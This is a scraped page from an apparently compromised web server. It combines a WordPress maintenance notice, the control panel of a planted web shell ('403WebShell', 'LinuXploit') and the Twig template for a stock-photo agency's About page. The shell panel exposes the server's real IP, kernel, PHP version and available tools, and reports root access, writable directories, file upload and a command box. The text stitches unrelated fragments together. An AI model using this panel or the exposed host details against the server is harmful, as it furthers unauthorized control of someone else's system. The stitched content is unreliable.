WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.216.240
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/sura/templates/static/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/sura/templates/static/about.html.twig
{% extends 'static_base.html.twig' %}

{% block title %}About Sura{% endblock %}

{% block body %}
    <div class="about_banner" style="background-image: url('{{ asset('images/hero_banner.jpg') }}')">
        {% if aboutPage %}
            {% if aboutPage.bannerStock %}
                <video autoplay muted loop id="myVideo">
                    <source src="{{ asset('uploads/page_images/')~aboutPage.bannerStock }}" type="video/mp4">
                </video>
            {% else %}
                <video autoplay muted loop id="myVideo">
                    <source src="{{ asset('images/video/sura_about_video.mp4') }}" type="video/mp4">
                </video>
            {% endif %}
        {% else %}
            <video autoplay muted loop id="myVideo">
                <source src="{{ asset('images/video/sura_about_video.mp4') }}" type="video/mp4">
            </video>
        {% endif %}

        <div class="wrap">
            {% if aboutPage %}
                <h2>{{ aboutPage.bannnerHeaderText }}</h2>
                <p>{{ aboutPage.bannerSubHeaderText }}</p>
            {% else %}
                <h2>African story through the lens</h2>
                <p>Sura Images is a digital stock-agency that provides African most engaging photography and
                    illustration from the most sought-after photographers/artists.</p>
            {% endif %}

        </div>
    </div>
    <div class="about_us">
        <div class="wrap">
            <div class="section_about">
                <div class="about_thumbnail">
                    {% if aboutPage %}
                        {% if aboutPage.featuredImage %}
                            <img src="{{ asset('uploads/page_images/')~aboutPage.featuredImage }}" alt="">
                        {% else %}
                            <img src="{{ asset('images/about_placeholder.jpg') }}" alt="">
                        {% endif %}
                    {% else %}
                        <img src="{{ asset('images/about_placeholder.jpg') }}" alt="">
                    {% endif %}

                </div>

                <div class="about_excerpt">
                    <div class="text_sheet">
                        {% if aboutPage %}
                            <h4>{{ aboutPage.title }}</h4>
                            <p>
                                {{ aboutPage.titleContent|raw }}
                            </p>
                            <h5>{{ aboutPage.mission|raw }}</h5>
                            <p>
                                {{ aboutPage.missionContent|raw }}
                            </p>
                        {% else %}
                            <h4>About Us</h4>
                            <p>
                                Sura Images is a digital stock-agency that provides African most engaging content (images and footage) from our contributors. It’s a creative resource for authentic African images, footage for commercial, editorial or personal use all in Royalty-Free, Rights-Managed and Rights-Ready licenses.
                            </p>

                            <p>
                                As an African creative resource we curatively select the best content from our contributors that will help our buyers accomplish their goal and in the end improve standards of storytelling. Our contributors price their own content and for every purchase of content our contributor get a commission, the best in the market rate. See contributor’s agreement for more details.  We are the first stock agency to introduce model-contributor payout i.e. modern day commercial modelling meaning our contributor can collaborate with models to create content for submission to our site and every time the content is purchased both model and contributor gets a commission based on the agreement between the model and the contributor.
                            </p>

                            <p>
                                Our content collection range from agriculture, lifestyle, architecture, landmarks, cityscape, landscape, wildlife, nature, telecommunication, infrastructure, technology, education, healthcare/medical, travel/holiday, business/finance, arts, sports/recreation, food and beverage etc. all-encompassing African setting.
                            </p>

                            <h5>Our mission</h5>
                            <p>
                                Connect all creative professionals around the globe with authentic African content (images, footage and illustrations) from our contributors in order to narrate their stories in print, television, digital, social media, advertising, editorial in the best way they know how.
                            </p>
                        {% endif %}
                    </div>
                </div>
            </div>
        </div>
    </div>
{% endblock %}

Youez - 2016 - github.com/yon3zu
LinuXploit